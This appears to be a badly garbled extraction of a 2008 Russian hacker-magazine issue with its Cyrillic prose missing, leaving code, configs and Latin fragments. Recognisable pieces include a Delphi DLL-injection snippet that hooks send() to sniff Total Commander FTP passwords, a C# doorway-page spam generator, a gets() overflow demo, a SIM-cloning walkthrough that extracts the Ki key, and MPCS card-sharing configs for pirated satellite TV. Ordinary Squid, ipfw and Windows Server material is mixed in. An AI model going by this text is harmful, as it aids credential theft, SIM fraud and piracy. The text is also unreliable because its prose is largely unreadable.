. ,
. .

Access Violtion.
3. .
xSend().
4. , . _pOldSend.
HookProc()

send() xsend(). ,
, - ,
.
, , , -,
, . ,
.
RunThreads(),
.

OnClick()
_h := OpenProcess(PROCESS_ALL_ACCESS, false,
StrToInt(lvProcessList.Selected.Caption));
_dllPath := ExtractFilePath(ParamStr(0)) +
'test.dll';
InjectDll(_h, pchar(_dllPath));

108


, .
, send().
,
. , , .
OnClick() ,
, OnClick(). ,
. , handle
pid
InjectDll(), .
,
TotalCommander FTP .
totalcmd.exe
Total Commander FTP , ,
FTP.
, , , .
.


send().
, WinSock API
, , .
,
. ,
, . , , .
, www.vr-online.ru ,
API . ! z
x 05 /113/ 08

>> coding

/ baiborodin@gmail.com /

C#

SEO-.
, .

,
.

, . ,
(doorway) . -,
.
, , -
, , , .

,
. doorway. .
? :). , , , .
?
, .
,
. . ,
. -, . , ,
.
- .
, ,

110

. ,
, .
. ,
. ,
.
? ,
SERPa. ,
, . ,
, ,
. , , doorway,
, ?. ,
, , .
. ,
( JavaScript), , ,
.
. ,
, . .

Achtung! !
,
. ,
x 05 /113/ 08

>> coding
.
, , ,
. ,
. , , ,
. ,
.
.
, , , ,
JavaScript , ,
- .
.
, . ,
.

, .
, : , , - ( ). , .

. ( ).

?
,
.
, . .
, ,
.
, , ,
CD Ejectora :).
, . ,
.
, , ,
, .
, .
.
(
). ,
. HTML-.
( ,
, ,
, ). .
,
,
.
HTML-
. <title>, <head>
.
.
1. ,
, .
.
2. ,

, , .
, ,
.
?
, ?
, ,
, .
. , ,
.
. (
) . . ,

:
;
<b> <strong>;
;
<title>, <description>, <keywords>;
;
;
, ;
;
;
;
;
:)

;
;
;
;
;
( ) ;
URL ;
, ;

;
, ;
;

.
, , . ,
, . ,
x 05 /113/ 08

111

>> coding

:

,
, , .
: ,
(
), .
. HTML-,
. , .
HTML- .
, .
. HTML-
(
). ,
,
. :
{TEXT}
{SCRIPT} JS
{MAIN_KEYWORD}
{RAN_KEYWORD}
. , www.klikforum.com,
.
,
, , .
: ,

.
, , , .
.
. .


.
checkedListBox.
. . , ,
, :
DialogResult result = fileChooser.ShowDialog();
String fileName;
if (result == DialogResult.Cancel)return;
fileName = fileChooser.FileName;
if (fileName == "" || fileName == null)
MessageBox.Show(" ", "Error",
MessageBoxButtons.OK, MessageBoxIcon.Error);
else {
input = new StreamReader(fileName);
makeKeyList();
}

112

,

makeKeyList().
private void makeKeyList() {
String a = null;
while (!input.EndOfStream) {
a = input.ReadLine();
if (a != null) checkedListBox1.Items.Add(a);
}
input.Close();
}
, ( EndOfStream) checkedListBox.
( ). ,
,
, :
private void checkedListBox1_ItemCheck(object sender,
ItemCheckEventArgs e){
String item =
checkedListBox1.SelectedItem.ToString();
if (e.NewValue == CheckState.Checked)addKey(item);
else remKey(item);
}
private void addKey(String val) {
if (keyList == null) keyList = new ArrayList(1);
keyList.Add(val);
}
private void remKey(String val) {
keyList.Remove(val);}
, , , keyList.
NewValue.
,
, addKey()
remKey().


.
. ,
, ,
.

.
x 05 /113/ 08

>> coding
lex[step] = (String)keyList[i];
step += step;
}
}
}

, , , .

. :
1. HTML-;
2. ;
3. ;
4. ;
4.1.
;
4.2. ;
4.3. ;
4.4. ,
;
4.5. HTML-.
,
, ,
. .

()
.
,
. ,
, . , ,
.
.
.
String[] lex = content.Split();
int lexCount = lex.Length;
int keyTotalAmount = (int)
(numericUpDown2.Value / 100 * lexCount);
if (keyTotalAmount != 0) {
int step = (int)(lexCount / keyTotalAmount);
for (int k = 0; k <= keyTotalAmount; k++) {
if (step <= lex.Length) {

! Split(),
.
,
.
(,

<h>, <i>, <b>),
. , .
,
Replace(), :
template = templ.Replace
("#title", (String)keyList[i]);
template = template.Replace
("#header", header);
template = template.Replace
("#redirect", redir);
String newText = "";
for(int k = 0; k < lex.Length; k++)
newText = newText + " " + lex[k];
template = template.Replace
("#text", newText);
, . ,
- , , .
, (
).

warning
,





black list.



.
,
. ,
.
.
.
.
,
(, ..)
.
, , .
,
. z


. ,
.
.
,
6-8%.
x 05 /113/ 08

dvd


,


?



Visual Studio 2008.

.
: .
. ,
, . (
).
.

113

>> coding



ANSI C, , ,
. .NET (managed) .

01

.NET C#, F#, Visual Basic , , , . Microsoft Visual C++


- (
MSCIL Microsoft Common Intermediate Language
Microsoft, ,
-).
, ,
-. , ,
, ,
libc, . . , ++ ( ), , #09h .
-,
using namespace System; /CLR, :
hello.cpp ++,


#include <stdio.h>
// System ( .NET)
using namespace System;
void main() {

printf("hello, nezumi!\n");
}

:

02

, Microsoft : )
; ) ;
) ,
.
, .NET
/++
- .
.NET 2, -
, -
(x86, x86-64, IA64),
, .
C#
( ). ,
++ , .
:
,

#include <stdio.h>
#include <string.h>
using namespace System;
void main() {

char buf0[0x6]; char buf1[0x6]; char buf2[0x6];

printf("enter str0 :");gets(buf0);

printf("enter str1 :");gets(buf1);

printf("enter str2 :")123;gets(buf2);

printf("your str is :%s,%s,%s\n",buf0,buf1,buf2);
}

$cl.exe /CLR hello.cpp


, hello.exe, hello,
nezumi! .

114


/CLR : .
06h ,
09h ( ).
x 05 /113/ 08

>> coding
:
$hello-over.exe
enter str0 :111111111
enter str1 :222222222
enter str2 :333333333
your str is :1111111122222222333333333,222222223333333
33,
333333333
, buf0 . buf1
; buf2 ,
( ). ,
, . , .
, , (
)
. - , ! ,
,
()
.
,

.
- !
.

03

, , , (, ),
. ,
C# , ++,
(native) ,
.
, .NET- P/Invoke,
,
#/C++
.
!
++ ,
. ,
Unicode:
nativecode.cpp ++ ,

#include "string.h"
#include "nativecode.h"
void native_foo(wchar_t* c, int num)
{
wchar_t* s = L"hello, this is native code!";
wcsncpy_s(c, num, s, wcslen(s));
}
(nativecode.h ) native_foo(), :
void native_foo(wchar_t* c, int num);
++ , native_foo(),
ref class CPPClass:

x 05 /113/ 08

clrcode.cpp ++ ,

native_foo()
#include "nativecode.h"
using namespace System;
namespace souriz {
ref class CPPClass {
public:
static String^ foo_wrapper()
{
wchar_t c[0x69];
native_foo(c, sizeof(c) / sizeof(c[0]));
return gcnew String(c);
}
};
}
C# , foo_
wrapper() ++ .
native_foo()
CPPClass.foo_wrapper():
program.cs C#, foo_weapper()
++ ,
native_foo()
using System;
using souriz;
namespace nezumi
{
class Program
{
static void Main(string[] args)
{
String s = CPPClass.foo_wrapper();
Console.WriteLine(s);
}
}
}

:
make.bat ,
$cl.exe /c /MD nativecode.cpp
$cl.exe /clr /LN /MD clrcode.cpp nativecode.obj
$csc.exe /target:module /addmodule:clrcode.netmodule
Program.cs
$link.exe /LTCG /CLRIMAGETYPE:IJW /ENTRY:nezumi.
Program.Main /SUBSYSTEM:CONSOLE /ASSEMBLYMODULE:
clrcode.netmodule /OUT:mix.exe clrcode.obj nativecode.
obj program.netmodule
, mix.exe ,
, . , IDA Pro (
)
, , ,
.
, (
.NET , ).
,
( ) , . z

115

>> phreaking

(Di Halt)
/ di_halt@mail.ru /

SIM.
, .

, - ,
.
, .

SIM. , .
. , .

,
, . ,
, SIM-
, . , . , . SIM-
(
, ).
,
,
, - (
on/off SIM-). SIM-. , ,
. ,
Siemens SK65
. , ,
, .

116

Multi SIM. ,
Silver Card. SIM- (
).
,
. Silver Card
, . Green
Card, A-SIM .
, SMS.


, SIM-,
.
, , PIC,
, .
, , , ,
. SIM-
,
, SMS International
Mobile Subscriber Identity (IMSI) Key for identification (Ki) .
IMSI Ki SIM- ( ).
.
IMSI-.
.
SIM-,
Ki- . Ki,
IMSI,
. SIM- , , ,
Ki. ,
.
. , Ki-
, SIM-
. , ,
(
CPU ), -
.
SIM- IMSI, Ki .
? .
Ki- SIM-.
, SIM-
. , , , , , . x 05 /113/ 08

>> phreaking

.

.
:).
0.125 ( 0.5 ,
) :
2.2 1.
10 4.
15 1.
22 1.
1 1 .
:
33 2 .
100 2 .

:
470 25 2.
:
1N4148 3 .
:
. 3.5 .
3102 1 .
3.579545 1.
74HC04 1.

COM DB-9
.

MultiSIM .
Silver Card
,
.
.
, ,
,
,
.
PIC16
24Lxx.
.

, ,
. Silver Card
- Sim-Emu v6.1
.
Green Green 2
Silver .
x 05 /113/ 08


. Silver 64 , Green 128,
Green 2 256.

SMS.
Green
,
Green 2.
.. Gold
Card
, , -,

(16 ),
-,
.

,
. ,

SimEmu v6.1,

.

Silver/Green SIMMAX.

,

,
reader,
.
, ,

-SIM.
,

.
,
Silver Card, ,
2in1.

.

/




(, 1111

; 2222

).
,

.
, - Silver Card

.
:
.
, ,
, ( SIM , ).

, Silver
Card. , -SIM
,
.

117

>> phreaking
Sim Reader .
3110

have .
.

Multisim menu

, 100%, (
), . , 65536
, Ki , , .
, ,
: COMP128v1 COMP128v2.
, . ,
128v2, Silver Card
, .

?
, , .
, , .
?
,
; ;
GPRS, .
, - ,
, , iPhone -
, PCMCIA GSM Modem, T-mobile , , MultiSIM must

118

, .
, , , . , -
, .
. -, SIM-
, ,
. MultiSIM ,
SIM- , . ,

.
,
SIM- IMSI-Ki.

? ? ?
, . ?
MultiSim . , (, Silver Card Multisim).
- , .
, . , . , , ,
. , SimEmu ,
.
. , Multisim
Card 250-500 , .
, . SIM,
MultiSIM. , ,

. SIM- .
,
!
. SIM-
.
SimScan, ,
x 05 /113/ 08

>> phreaking

Silver Card! ,

Woron Scan, Ki . -
.
, Silver Card.

Reader

SIM-, .
.
.
. , , ,
. - .
,


,
. ,
, reader
.

. 6 4
, .
50 .
. ,
. , . ,
.
( -120) .
, . . .
SIM-.
, .
.
, Nokia 3110
.

, ( ). ,
, .
.

Lets go shake, shake!


, //. Ki . -,
SIM- Woron Scan. Card Reader
Phoenix Card. Card Reader Settings
9600 , .

Sim Reader
x 05 /113/ 08

119

>> phreaking

SimScan
SIM-

Ki
Woron Scan
RST . ,
- :
The real speed is 9600..
There is a card in Phoenix device:
ATR:
3B 9B 95 80 1F 43 80 31 30 73 32 21 00 53 25 99
01 DD
, , , .
, . IMSI
IMSI-.
Ki-. Ki START
PIN- ( SIM-)
. , .
Ki .
,
. 60000 , . .
60000 , .
, .
, . .
, - ,
SimScan. ,
. ,
Find Ki.
, , MultiSIM .
SIM- (, Siemens ). Sim-Emu 6.01s (
A-sim -, Silver ,
-).
. :
Sel.Phone .
, .
Configure , .
Information ,
.
Reset . , :).
Configure. :
Edit # ,
. - Beeline

120

Woron Scan

. ,
.
, Beeline
.
Config.Pos .
, PIN2 ( 1234).
, .
. , 0.
IMSI. 16
. Ki ! , , . .
PUK . ,
. , PIN .
. PIN,
0,
, , ,
PIN-. , ?
Config.SMS SMS.
.
Config.ADN .
, 1.
PIN2/PUK2 , PIN2
PUK2 .
Erase.Pos SIM-. ( ) OK.

Outro
, , MultiSIM .
. - ,
di-halt.livejournal.com. , .
, ! z
x 05 /113/ 08

>> phreaking

Genocide
/ genocide@xakep.ru /



.
,
. ,
.
.
, .

.

, .

C ?
][ ,
, . ,
,
. , ,
. ,
,
.
,
. , ,
,
.

122


, , ? : . .

. : OpenBox
Dream Box, .
, Power PC,
Linux , ,
. Dream Box
, - . , .
. ,
, OpenBox 300 .
, .
OpenBox, RS232 , ,
, -.
.


?
. ,
, .
. Rx Tx. .
.
.
. . , :
1
2
3
5

1
3
2
5

.
- ,
. ,


. .
.

MPCS !
, ,
MPCS. ,
x 05 /113/ 08

>> phreaking
,
. - , , ( ).
.
.
, mpcs.conf:
[global]
Nice
= -1
#LogFile
= log
#LogFile
= /dev/tty
ClientTimeout = 5
LogFile
= stdout
[serial]
Device

= tuner@/dev/ttyS0?delay=1&timeout=300

Device = tuner@/dev/ttyS0?delay=1&timeout=300
, COM1
ttyS0. 2 Device = tuner@/dev/ttyS1?delay=1
&timeout=300 ..
. , , -
, .
mpcs.server.
.

[reader]
Label
= newcamd
Protocol
= newcamd
Key
= 0102030405060708091011121314
Device
= kardsharing-super-server.ru,10000
Account
= Genocide_login,my_k00l_password
Fallback
=0
Group
=1
ReconnectTimeout = 20
Label ,
.
Protocol ,
. newcamd, , , camd35 cs357x-.
. , , .
Key . 010203040506070809
1011121314.
Device , ; ( IP)
. .
Account , : , , :).
.
.

BusyBox
? - , UNIX , .
. BusyBox , . BusyBox
.
, .
x 05 /113/ 08


OpenBox. !
menu 1 1 1 7, . . No. CA SYS 0500, Index Provider
02 07 10. ;
, , , .
, MPCS .
:
2008/04/06 20:06:50 1420 s >> STREAMBOARD << mpcardserver started
2008/04/06 20:06:50 1420 s newcamd: disabled
2008/04/06 20:06:50 1420 s radegast: disabled
2008/04/06 20:06:50 1420 s logger started (pid=1564)
2008/04/06 20:06:50 1420 s resolver started
(pid=1580, delay=30 sec)
2008/04/06 20:06:50 1420 s proxy started (pid=1600,
server=******.*****
2008/04/06 20:06:50 1420 s anti cascading: disabled
2008/04/06 20:06:50 1420 s serial: initialized
(pid=1616, auto@/dev/ttyS0
2008/04/06 20:06:50 1600 p02 proxy ******.*****:10000
newcamd525
2008/04/06 20:08:09 1616 c01 detected dsr9500extended
type receiver
2008/04/06 20:08:09 1616 c01 plain dsr9500client
127.0.0.1 granted
2008/04/06 20:08:10 1600 p02 server ******.*****:10000
caid: 0500
2008/04/06 20:08:17 1616 c01 tuner (0500&020710/5015/4
A:97FA): found (774 ms)
2008/04/06 20:08:27 1616 c01 tuner (0500&020710/5015/4
A:97FB): found (895 ms)
2008/04/06 20:08:37 1616 c01 tuner (0500&020710/5015/4
A:97FA): found (936 ms)
2008/04/06 20:08:47 1616 c01 tuner (0500&020710/5015/4
A:97FB): found (828 ms)
2008/04/06 20:08:57 1616 c01 tuner (0500&020710/5015/4
A:97FA): found (699 ms)
.
, .
,
. ,
, , .

!
.
. . ,
LanCom Box. ,
- Ethernet.
( ,


DLINK-500T LAN- , ,
ADSL- , MPCS !
, LAN-. VPN- ,
.

123

>> phreaking

OpenBox-300.

DreamBox ,

OpenBox

, - VPN).
ADSL-. , ADSL , (
),

Linux- . .
, ADSL- DLINK-500T
, uLinux MPCS. ,
DLINK-500T RS232.

, - , .
. ,
.


, ,
Dlink-500 ( ,
Intel).
, Samsung. RS232. ? !
! ?
JP2. ,
UART, RS232
MAX3232. - Sprint
Layout . ,
, ,
. , , RS232,
MAX3232 .
, ,
Rx Tx MAX3232, ,
. ,
, :
1
2
3
4
5

Rx
Vcc
GND
Tx

124

mpcs.conf
[global]
Nice = -20
LogFile = /dev/null
ClientTimeout = 5
[monitor]
Port = 988
NoCrypt = 192.168.0.0-192.168.255.255
AULow = 120
MonLevel = 4
[newcamd]
Key = 0102030405060708091011121314
Port = 50000@0500:020710
[cs378x]
Port = 50002
[camd35]
Port = 50001
#[serial]
#Device = tuner@/dev/ttyS0?delay=1&timeout=300
x 05 /113/ 08

>> phreaking

links

. TTL-RS232 .
MAX232 .

.



, ! Mcmcc.
http://mcmcc.bat.ru (
).
. ,
IP-. ( Login Admin, password
Admin). Tools Update Gateway.
Update
Gateway. ,
Status Information ,
.

MPCS. Telnet,
telnet 192.168.1.1.
.
, , root Admin.
BussyBox:
BusyBox on router login: root
Password:
********************************************

-.

*
ADSL LAN ROUTER D-Link DSL-500T (McMCC)
********************************************
BusyBox v0.61.pre (2007.01.15-21:12+0000)
Built-in shell (ash)
Enter help for a list of built-in commands.
#
cat /proc/ticfg/
env, ,
:
mtd0
mtd1
mtd2
mtd3
mtd4

satcode.biz

,
.

MPCS.
viaccessforfree.info


.
southern-bear.pisem.
net/sattv/doc
.

0x90083000,0x903f0000
0x90010090,0x90083000
0x90000000,0x90010000
0x903f0000,0x90400000
0x90010000,0x903f0000

:
echo "mtd5 0x901F0000,0x90200000" > /proc/
ticfg/env
echo "mtd4 0x90020000,0x901F0000" > /proc/
ticfg/env
echo "mtd0 0x90097000,0x901F0000" > /proc/
ticfg/env

dvd
MPCS
, ,
.

( reboot)
( cat /proc/ticfg/env), .

mpcs.user

mpcs.server

[account]
User = tuner
Pwd = tuner
Group = 1

[reader]
Label = newcamd
Protocol = newcamd
Key = 0102030405060708091011121314
Device = *******,***** //
-
Account = *******,***** //
.
CAID = 0500
IDENT = 0500:020710
Fallback = 0
Group = 1
ReconnectTimeout = 20

[account]
User = monitor
Pwd = monitor
Group = 1

x 05 /113/ 08

125

>> phreaking

ADSL- Dlink500T.
-

-.

FTP- tFTPd32.exe.
:\ :\LAN , MPCS FTP-.
:
mpcs.mem
mpcs.guess
mpcs.ac
mpcs.srvid
mpcs.conf
mpcs.server
mpcs.user
mtd5.tar
tftpd32.exe

MPCS (192.168.0.2).
, RS232 RS232
. Line ADSL, LAN
. ADSL ,
. !

?
!
ADSL ( , ), GPRS.
. ,
.
newcamd
. , .
Java , .
,
.


MPCS .
tftpd32.exe telnet .
:
cd /var/tmp
tftp -g -l mtd5.tar 192.168.1.2
tar -xf mtd5.tar
cd mycfg
tftp -g -l mpcs.conf 192.168.1.2
tftp -g -l mpcs.server 192.168.1.2
tftp -g -l mpcs.user 192.168.1.2
cd ..
tar -cpf m.tar mycfg
gzip m.tar
cfgsave m.tar.gz
reboot

126

,
. , ,
. ,

( ) ? ,
. DVD,
, , , , .
. . ,
. ,
.
, . , ,
- ,
. z

x 05 /113/ 08

>> .pro
GrindEr

/ grinder@ua.fm /


Longhorn
WINDOWS SErVEr 2008:

Microsoft .
Windows Server 2008 Longhorn . - . , .

(Beta
1 2005 ), Win2k3, . ,

18

Vista SP1, . , , , Vista ( ,


, NAP),

x 05 /113/ 08

>> .PRO



.
Win2k3 . ,
(ntoskrnl.exe) .
, .
, 64
-, NT.
. .
Vista 2k8 SMB 2.0 ,
.
.
DCPROMO . ,
, .

. ,
Export Setting.
,
. , DCPROMO
. .
(ReadOnly Domain Controller RODC). DC ,
, ,
. RODC Active
Directory .

(Network Policy and Access Service), IAS
(Internet Authentication Server). , , RADIUS .
(Network Access Protection NAP). , , ,
.
NAP, ,
System Health Validators (SHV),
(NPS).
, . (Connection Request Policies).

: ,

x 05 /113/ 08

, ,
. .
, NAP *nix
Windows XP . ,
. NPS ,
.
IIS 7.0, .
40 , 8
( ,
). , FTP-
.

Win2k8
, , . Standard,
Enterprise, Datacenter Web ( 32 64 )
Itanium Windows Server 2008 for
Itanium-Based Systems. , ,
32 . , Hyper-V.
without Hyper-V, .
, . Hyper-V
, .
.
: 1 (x86) 1.4
(x64), 512 10 .
, .
. 60
, 948472,
, 240 .
, .
,
60 , , slmgr.vbs -dli.
,
.
,
Windows.
,

129

>> .pro

network connections

. 2k3 . , New
. Format .

(, ): Full Core Installation.

,
. .
. ,
, .
Create a password reset disk. , ( !)
.
Win2k3 .
, Aero Vista.

Windows , . ,
.
, , Security Configuration Wizard
( ). , , secedit.
,
.
(Role Services). , Network
Policy and Access Service 6 Role Services,
. ,
, , Role Services
Server Manager. :
.
Network Connections,
, , IPv4,
IPv6. Microsoft .
, Alternate
Configuration. ,
. Link-Layer Topology Discovery Mapper
,
Responder .
Task Scheduler, .
.


.
Initial Configuration Tasks, Win2k3. ,
.
Initial Configuration Tasks ,
.
, , Windows
Firewall, , (Features).
, .
16 (),
(AD, AD, Network Policy Server, ). , , .
, , . ,
BitLocker, (Network
Load Balancing), PowerShell, Telnet, SMTP, SNMP,
,
. ( )
.

130

seRVeR MaNageR
. , Add Hardware,
, P-n-P. Network and Sharing Center , , , .
Administrative Tools .
(Server Manager), Computer
Management Win2k3.
. , Administrative Tools, Server Manager.
,
.
,
, -

x 05 /113/ 08

>> .pro

info

ServerManagercmd.
exe, ,

.
network Policy Server

. ,
. Server Manager
: (
), ,
, .
,
.

.
,
, .

. ,
. ,
, , . ,
,
, .
, , ,
( Administrative Tools).
, , WMI,
, , . Storage ,
: Windows Server Backup Disk Management.
(Shadow Copy, )
.


,
Win2k8. .
,
. , .
Windows Firewall Server
Manager Administrative
Tools. Initial
Configuration Task. (Domain), (Private)
(Public). ,

x 05 /113/ 08

, , ,
, , .
IPSec.
,
.
.



. Event Viewer,
, .
.
,
Server Manager. Win2k8
Microsoft
Operations Manager. Summary
,
. , , .
, Event Viewer,
, .
XML-
. Subscriptions.
Windows Event Collector Service, , ,
. , .
, ,
, Event Viewer .
, ,
.
Attach Task To This Event,
Create Basic Task Wizard,
: e-mail,
.


, Win2k8
,
, , ,
. ,
, . z

,
60- , ,
slmgr.vbs dli.
slmgr.
vbs rearm
,
,
60 ,
.

!
(
),

.

links


Longhorn
:
www.microsoft.com/
windowsserver2008.
948472
21 ,
,
,

240 .
Beta 3
][ www.
xakep.ru/post/41325.

131

>> .pro
GrindEr
/ GRiNDER@UA.fM, TUx.iN.UA /

SQuID:

Web- ,
- Squid.
, . , Squid .
sQUiD
Squid. Squid, (www.
squid-cache.org) , / HTTP, FTP . TLS/SSL ,
DNS, Squid
. GNU GPL.
Unix GNU/Linux, *BSD, Mac OS X,
SunOS/Solaris. Windows.
Ubuntu,
( -

13

). ,
: 2.x 3.x. STABLE
, . Ubuntu 6.06 LTS Dapper Drake
Squid 2.5, 7.10 2.6.14.
Ubuntu, Festy Fawn (7.04),
Squid. .
Ubuntu :
$ sudo apt-get install squid squid-common

x 05 /113/ 08

>> .PRO

Ubuntu Squid

, Squid 3:
$ sudo apt-get install squid3 squid3common
squid.conf
Squid
. FATAL:
Could not determine fully qualified hostname.
Please set 'visible_hostname'. ,
, Squid,
gethostname(). DNS
,
Generated by server.com
(squid/3.0.STABLE2), .
Squid /etc/
squid/squid.conf. .
,
, :
$ sudo grep -v "^#" /etc/squid/squid.conf | sed
-e '/^$/d'
squid.conf Unix.
: . , , .
.

.
include. ,
.
Squid, ,
. Squid ( ):
visible_hostname mysquid
:
$ sudo /etc/init.d/squid start

3128/tcp. netstat ant |
grep 3128 , .
OK, -
- . localhost.
, ,
.

x 05 /113/ 08


http_port, Squid
:
http_port 192.168.0.1:3128
192.168.0.0,
172.16.0.0 192.168.1.1
Squid,
ACCESS CONTROL:
acl localnet src 192.168.0.0/24 172.16.0.0/12
192.168.1.1
, ,
acl -i, .
, . ,
, (
),
. .
src ( source). (dst), - (arp),
(srcdomain, dstdomain), (port),
(proto), (time) . ,
acl,

http_access . ,
, :
acl work_hours time M T W T F 9:00-18:00
,
. ACCESS CONTROL
ACL, ,
( ) ACL,
:
acl SSL_ports port 443 563 873
acl Safe_ports port 80 21 443 563 1025-65535
acl all src 0.0.0.0/0.0.0.0

.

info

Squid

( ,
),


.
Ubuntu sudo
apt-cache search
squid.

Squid
/usr/share/doc/
squid
.

- bfilter
(bfilter.sf.net)
squid
adzapper (adzapper.
sf.net).

Squid 2.6

,

httpd_
accel_* http_port
127.0.0.1:3128
transparent.

133

>> .pro

Squid

, http_access ACL.
:

Squid Webmin

, :
http_access allow work_hours workip
http_access deny workip

http_access allow|deny [!]_ACL


, ,
. :
http_access deny all
.
, , . , , ,
.
Squid , :
http_access allow localnet
http_access deny !Safe_ports
http_access deny !SSL_ports
Squid:

ACL:
IP-. ACL workip ( ).


, Squid , .
: acl http_access. ,
:
acl denynet dst 194.55.0.0/16
http_access deny denynet
, , dstdomain
. ,
RapidShare:
acl rapida dstdomain .rapidshare.com .rapidshare.de
http_access deny rapida

$ sudo /etc/init.d/squid restart


. , .
, iptables:
iptables -t nat -A PREROUTING -i eth1 \
-p tcp -m tcp --dport 80 -j DNAT \
--to-destination 192.168.0.1:3128
iptables -t nat -A PREROUTING -i eth0 -p tcp -m tcp \
--dport 80 -j REDIRECT --to-ports 3128
. ,
IP . :
acl workip src 192.168.1.100 192.168.1.200192.168.1.210
http_access deny !work_hours workip

134

, ( ,
- ),
:
http_access deny workip dstdomain
, . ,
, , , . ACL
:
acl adult dstdom_regex sex
acl regexdomain dstdom_regex \.com$ \.net$ \.tv$
http_access deny adult regexdomain
,
sex, .com, .net .tv.

x 05 /113/ 08

>> .PRO

Webmin

,
dstdom_regex url_regex urlpath_regex.
URL.
, URL ( ). , ,
.
urlpath_regex ,
. , -i:
acl videofiles url_regex i *\.avi$ *\.mpg$ *\.mp4$
*\.swf$
acl soundfiles urlpath_regex -i \.mp3$ \.asf$ \.wma$
http_access deny videofiles soundfiles
, URL :
acl blockfiles urlpath_regex -i "/etc/squid/blocks.
files.acl"
http_access deny blockfiles
:
$ sudo nano /etc/squid/blocks.files.acl
\.exe$
\.avi$
\.mpg$
\.mpeg$
\.mp3$
Squid.
, , URL . deny_info,
ERROR PAGE OPTIONS.
URL, , ACL,
deny_info.
/etc/squid/errors HTML. ,
error_directory ( Ubuntu
/usr/share/squid/errors/English). squid.conf:
deny_info ERR_BLOCKED_FILES blockfiles
/etc/squid/errors/ERR_BLOCKED_FILES,
.
. , Google AdSense
:

x 05 /113/ 08

Webmin

acl adsense url_regex i *pagead2*


http_access deny adsense
proto, (http ftp),
,
:
acl ftp proto ftp
http_access deny ftp workip
, workip,
FTP-. ACL
. ,
squidGuard (
).


.
. Ubuntu /var/spool/squid. . ,
cache_dir. :
cache_dir type L1 L2 [options]
:
cache_dir ufs /var/spool/squid 10249 16 256
type : ufs (unix file system), aufs diskd.
ufs .
, ,
100 . ,
( 10 ).
, cache_dir,
, .
Squid ,
,
.
L1 L2. 16 256, . cache_
dir read-only ( ) max-size
( ).

maximum_object_size. 4 ,
:

135

>> .PRO
maximum_object_size 10240 KB

links
wiki.
squid-cache.
org/ConfigExamples

Squid.

warning


Squid.

136

control: public, .
, :
ignore-no-store Cachecontrol: no-store;
refresh-ims If-Modified-Since.

, :

, minimum_object_size,
/ STEP@GAMELAND. RU/
,
( 0). , Squid
, cache_mem ( 8 ).
, . Squid
, .
refresh_pattern .
518400 80% 518400
. ,
reload_into_ims override-expire override-lastmod reload-into nocache reload .
ims ignore-no-cache ignore-private ignore HTTP,
auth ignore-no-store
,
:
Squid.
. reload_into_ims on
,
.
. ,
.
, reload_into_ims
, server.com/current.
refresh_pattern,
exe. :
:
refresh_pattern \.exe$ 43200 100%
43200
refresh_pattern [-i] regex min percent max
override-expire override-lastmod reload-into[options]
ims ignore-no-cache ignore-private ignoreauth ignore-no-store
regex ,
refresh_pattern \.zip$ 43200 100%
43200
.
.
override-expire override-lastmod reload-into. . min
ims ignore-no-cache ignore-private ignoremax
auth ignore-no-store
, .
percent . .
. min 0,
acl/

http_access ,
. Squid 2.x , :
:
refresh_pattern http://ad\.
43200
refresh_pattern ^ftp: 1440
20%
10080
100% 43200 override-expire override-lastmod
refresh_pattern ^gopher:1440 0%
1440
reload-into-ims ignore-no-cache ignorerefresh_pattern .
0
20%
4320
private ignore-auth ignore-no-store
refresh_pattern http://click\. 43200
3.0 . :
100% 43200 override-expire override-lastmod
reload-into-ims ignore-no-cache ignorerefresh_pattern (cgi-bin|\?) 0
0% 0
private ignore-auth ignore-no-store
refresh_pattern http://count\. 43200
options
100% 43200 override-expire override-lastmod
. 2.x , 3.
reload-into-ims ignore-no-cache ignore .
private ignore-auth ignore-no-store
HTTP, .
.
: URL,
.
override-expire
expire,
- bfilter (bfilter.
;
sf.net) squid adzapper (adzapper.
sf.net).
override-lastmod , ;
, .
reload-into-ims, ignore-reload - , Webmin,
nocache reload
, ;
. 10.

ignore-no-cache, ignore-private, ignore-auth Pragma: no-cache, Cache-control:
,
no-cache, Cache-control: private Cache. z

x 05 /113/ 08

>> .pro

/ amsand@rambler.ru /

- frEEBSD

, . ,
, .
, ,
.
,
. , Apache, - (
) rl0,

138

, rl0 . , ,
, , BGP,
. , , ,

x 05 /113/ 08

>> .pro

log ipfw, /var/log/security

, , , ?
, ,
, ,
, .
FreeBSD ipfw. , ,
.
.
172.16.0.0/16, . . (
255.255.0.0).
, - , (aka ).
:
IP- 100.100.100.102 ( 100.100.100.101), ADSL-
192.168.1.1 ( PPPoE, IP NAT-
; , , 192.168.1.1
).
, (,
-), .


. -,
, . -, (

x 05 /113/ 08

), (
: 1-,
2-). -, , ,
SMTP , ,
.
( , , ):
1. ,
213.100.0.0/16 213.200.0.0/24, 2- ,
1-.
2. 2- 172.16.0.x, 1- 172.16.1.x
172.16.2.x.
3. SMTP- 1- ( , Sendmail ),
2- .
4. HTTP- 172.16.1.x
2- , 1-; HTTP .
5. TCP-
, 2:1,
.

139

>> .pro

nAT

. , ,
, , , . -
,
,
.
, NAT, , . ? :
( , ) , .
, ,
, .
, .

1:

.
( , ),
213.100.0.0/16 213.200.0.0/24
:
# route add default 100.100.100.101
# route add 213.100.0.0/16 192.168.1.1
# route add 213.200.0.0/24 192.168.1.1
, /etc/
rc.conf :
$ grep route /etc/rc.conf
static_routes="prov1_100 prov1_200"
route_prov1_100="213.100.0.0/16 192.168.1.1"
route_prov1_200="213.200.0.0/24 192.168.1.1"
defaultrouter="100.100.100.101"
,
, . ,
:

140

ipfw show , ,

# route add 0.0.0.0/1 192.168.1.1


, , ,
, ,
.
NAT-.
, , ,
,
,
( , ).
, :
# natd -a 100.100.100.102 -p 8668
# natd -a 192.168.1.2 -p 8669
# ipfw add divert 8668 ip from 172.16.0.0/16 to any via
rl0 out
# ipfw add divert 8669 ip from 172.16.0.0/16 to any via
ed0 out
# ipfw add divert 8668 ip from any to 100.100.100.102 via
rl0 in
# ipfw add divert 8669 ip from any to 192.168.1.2 via ed0
in
? , ,
, ,
( ).
natd,
IP- .
.
FreeBSD 7.0
natd:
#
#
#
#

ipfw
ipfw
ipfw
ipfw

nat
nat
add
add

1 config ip 100.100.100.102
2 config if 192.168.1.1
nat 1 from 172.16.0.0/16 to any via rl0
nat 2 from 172.16.0.0/16 to any via ed0

x 05 /113/ 08

>> .PRO

info

, tcpdump

# ipfw add nat 1 from any to 100.100.100.102 via


rl0
# ipfw add nat 2 from any to 192.168.1.1 via ed0
, . ,
, , .

2:
, ,
.
,
. , (
NAT-)
, .
forward-
. ,
, :
# ipfw add 1000 divert 8669 ip from
172.16.0.0/16 to 213.100.0.0/16
# ipfw add 1010 divert 8669 ip from
